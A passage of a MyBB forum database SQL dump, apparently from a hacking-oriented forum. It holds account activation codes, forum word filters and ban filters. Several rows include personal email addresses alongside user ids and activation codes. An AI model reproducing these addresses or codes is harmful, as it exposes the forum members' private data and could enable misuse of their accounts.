'pptx', '1024', 'images/attachtypes/ppt.gif'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_awaitingactivation`; CREATE TABLE `mybb_awaitingactivation` ( `aid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `code` varchar(100) NOT NULL DEFAULT '', `type` char(1) NOT NULL DEFAULT '', `oldgroup` bigint(30) NOT NULL DEFAULT '0', `misc` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`aid`) ) ENGINE=MyISAM AUTO_INCREMENT=361 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_awaitingactivation` WRITE; INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('1', '2', '1339902841', 'nMouQ2oB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('3', '6', '1341496105', 'nksAq26q', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('7', '10', '1341932547', 'q1mP8aon', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('17', '21', '1343932555', 'WzdUNxVq', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('19', '23', '1343946510', 'DRssoA28', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('20', '24', '1343950326', 'EIEvTGqp', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('23', '27', '1343995649', '1ZsWgtPc', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('24', '27', '1343996905', '55wB7AN1', 'p', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('30', '33', '1344130975', 'XNytPL1k', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('31', '34', '1344133043', 'ButVWDe3', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('39', '42', '1344566640', '6WCmgrDp', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('40', '43', '1344779319', 'KamEMHmo', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('45', '48', '1344941742', 'NCgEeHSs', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('48', '51', '1344956262', 'cxOvHGUJ', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('51', '54', '1344989631', '6W6wNO92', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('52', '55', '1344992773', 'xAFqCHoH', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('53', '56', '1344993267', 'YWPFwIgj', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('54', '57', '1344993351', 'yqBpdItR', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('58', '61', '1345060919', 'RrXpV6PB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('59', '62', '1345063471', 't9R6pY4Z', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('60', '63', '1345102325', 'm5RPB6Y2', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('64', '67', '1345127387', 'zeL97f93', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('62', '65', '1345109756', 'cbvvI5jr', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('65', '68', '1345134913', 'bVBa3Dy5', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('66', '69', '1345210865', 'tWtA8mlQ', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('67', '70', '1345219533', 'ls5wrsu4', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('77', '80', '1345473467', '36n1tg3o', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('79', '82', '1345502806', 'l4474tLM', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('84', '87', '1345577127', '3dyn5dV8', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('86', '89', '1345578984', 'KI9UqbK9', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('87', '2', '1345591345', 'Q9PBTcvc', 'l', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('88', '90', '1345594226', 'dyXfo84t', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('89', '91', '1345596642', 'FQibVigD', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('95', '97', '1345640081', 'jVH7n3oQ', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('98', '100', '1345677377', 'LHeojWMS', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('99', '101', '1345731070', 'Q6lEWqZy', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('106', '107', '1345810510', 'gWeDrvxu', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('107', '108', '1345810767', 'LRuizqVi', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('108', '109', '1345811031', 'u23Tp3Vk', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('109', '110', '1345811370', 'KfjAzAJY', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('110', '111', '1345811680', 'ktqIzIKV', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('112', '113', '1345831161', 'HrUccPY2', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('115', '116', '1345849083', '4tWXqCKB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('116', '117', '1345862758', 'iUvzxM6f', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('118', '119', '1345873087', 'VKgKgtrY', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('119', '120', '1345875927', 'LdeaAWcB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('120', '121', '1345905447', 'yFLDlNtd', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('122', '123', '1345907236', '3qulRgvv', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('123', '124', '1345912406', 'AHLQC4Qt', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('125', '126', '1345917400', 'vZ2urHLN', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('128', '129', '1345970266', 'To8rFSc9', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('129', '130', '1345970370', 'sWt1zQ6Q', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('131', '132', '1346036311', 'D9ftrt5F', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('132', '133', '1346040899', '6VCpv192', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('133', '134', '1346085676', '34q47Yuu', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('134', '135', '1346112256', 'iPHdCSIx', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('135', '136', '1346119444', 'XT7SGCVd', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('136', '137', '1346124687', 'vrQ4m1hB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('183', '19', '1347173491', 'ZuLXFF75', 'p', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('138', '138', '1346168589', '9j9OejBR', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('139', '139', '1346188577', 'hrXeG4O1', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('140', '140', '1346189259', '7c3LFANX', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('141', '141', '1346191779', 'ncjeZ8Kw', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('142', '142', '1346246339', '3peFJyFi', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('143', '143', '1346250606', 'rYMA6mUp', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('144', '144', '1346253791', 'ph3cIbhp', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('145', '145', '1346260802', 'H6k8Wudj', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('146', '146', '1346262699', 'DKaIQmpX', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('147', '147', '1346266776', 'WSUTUkbR', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('149', '149', '1346318204', 'z4MfEjIw', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('161', '161', '1346434237', 'u3Qp5dmE', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('155', '155', '1346370609', 'XSGNV2Mi', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('156', '156', '1346370834', 'FU4NYMXk', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('157', '157', '1346374246', 'd8IncZz4', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('158', '158', '1346376902', '9zvdOcIO', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('163', '163', '1346508814', 'Pi9uuRAC', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('166', '166', '1346646892', 'n3unYa91', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('168', '168', '1346757136', '4iCKVig7', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('169', '169', '1346759648', 'Ia6lj37j', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('170', '170', '1346762462', '71OmdwDr', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('174', '173', '1346803206', 'VzBR5lju', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('175', '174', '1346835586', 'j7oOHfFQ', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('176', '175', '1346860390', '3xPiGJGN', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('177', '176', '1346863254', 'WwUyo2ff', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('178', '177', '1346873134', 'P5LSRz6k', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('180', '179', '1346983817', 'aEVr8r8N', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('182', '181', '1347135400', 'JMT1JYwH', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('192', '190', '1347751435', 'tHqjQmwa', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('194', '191', '1347758686', 'XOhwb21T', 'e', '2', 'rayboy1995@aol.com'); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('202', '198', '1348535413', 'tWE2u4Py', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('205', '201', '1348804805', 'NR3xQkmp', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('208', '204', '1348891320', 'sa9o5Hby', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('213', '209', '1349019583', 'vqE6IdjI', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('214', '210', '1349049238', 'XOBK2SCF', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('215', '211', '1349056669', 'vhQRgzJW', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('221', '217', '1349386240', 'MGM7ZQTc', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('222', '218', '1349398815', 'vpCJaaFf', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('244', '238', '1349707619', 'dAPjYGPm', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('248', '242', '1349733809', 'Caxoy5CO', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('249', '243', '1349733865', 'dhAGoTxi', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('250', '244', '1349739454', '7D4Ge8gG', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('251', '245', '1349739576', 'iwOQdOcs', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('254', '248', '1349759153', 'TYrfj7iG', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('256', '250', '1349814285', 'GCMcboOd', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('270', '228', '1350221313', 'bPBOxiJg', 'e', '2', 'mymobilebussines@gmail.com'); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('271', '261', '1350224829', '5n72d1jJ', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('273', '263', '1350353250', 'uuphfGAV', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('279', '269', '1350496931', 'oJC3oTte', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('283', '273', '1350527085', 'XsBjVUYs', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('284', '274', '1350533122', '1kQNhrqB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('285', '275', '1350548413', 'nUNEcbgq', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('286', '276', '1350576634', 'QaCpINWk', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('289', '279', '1350637912', 'szuhW3xt', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('290', '280', '1350641658', 'pM6TD7IA', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('293', '249', '1350685895', 'Ugb7CZxF', 'p', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('295', '283', '1350732720', 'JOQHrZIh', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('298', '286', '1350926848', 'Qla7NWtB', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('299', '287', '1350978794', 'YHuCBDJC', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('304', '292', '1351238750', 'flIb429i', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('305', '293', '1351282538', 'NzKGMTZI', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('308', '296', '1351342217', 'CcYn67JD', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('310', '298', '1351343949', 'Mg4VEddG', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('311', '299', '1351403535', '74pLY9N8', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('312', '300', '1351459447', '7drV2YpK', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('313', '301', '1351460290', 'Ow2HCJ5L', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('315', '303', '1351528448', 'VAUsCt5j', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('319', '307', '1351662517', 'fmhvCguA', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('320', '308', '1351732230', '91R2i1Jv', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('321', '309', '1351779339', 'eD1gVxPP', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('322', '310', '1351789824', 'kexvYWMD', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('324', '314', '1351879481', 'FWEfs8bs', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('327', '317', '1351967367', '3yWKGqRw', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('332', '322', '1352132581', 'IUvv3jKb', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('344', '334', '1352431527', '9MjKXWzP', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('346', '336', '1352468655', 'ccXUOGxO', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('347', '337', '1352490604', 'R3SEHlme', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('349', '339', '1352508374', 'wUfo1Dzw', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('350', '340', '1352544776', 'BK1j7bWL', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('353', '343', '1352608808', 'QQGd9znu', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('354', '344', '1352622844', 'ORmWrqf7', 'r', '0', ''); INSERT INTO `mybb_awaitingactivation` (`aid`, `uid`, `dateline`, `code`, `type`, `oldgroup`, `misc`) VALUES ('355', '319', '1352624668', 'GGSzfBt2', 'p', '0', ''); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_badwords`; CREATE TABLE `mybb_badwords` ( `bid` int(10) unsigned NOT NULL AUTO_INCREMENT, `badword` varchar(100) NOT NULL DEFAULT '', `replacement` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`bid`) ) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_badwords` WRITE; INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('1', 'hackforums', '[censored]'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('2', 'sharecash', '[censored]'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('3', 'shitcash', '[censored]'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('7', 'hafeez', 'Jok3r'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('8', 'kamran', 't3h'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('10', 'wrzhost', '[censored]'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('11', 'l33thacking.com', 'l33thacking.net'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('12', 'kamz*', '[Word Forbidden]'); INSERT INTO `mybb_badwords` (`bid`, `badword`, `replacement`) VALUES ('14', '*lthackin*', '[Forbidden to Use]'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_banfilters`; CREATE TABLE `mybb_banfilters` ( `fid` int(10) unsigned NOT NULL AUTO_INCREMENT, `filter` varchar(200) NOT NULL DEFAULT '', `type` int(1) NOT NULL DEFAULT '0', `lastuse` bigint(30) NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`fid`) ) ENGINE=MyISAM AUTO_INCREMENT=89 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_banfilters` WRITE; INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('2', 'admin*', '2', '1351779020', '1339730870'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('28', '*hackforums.net', '3', 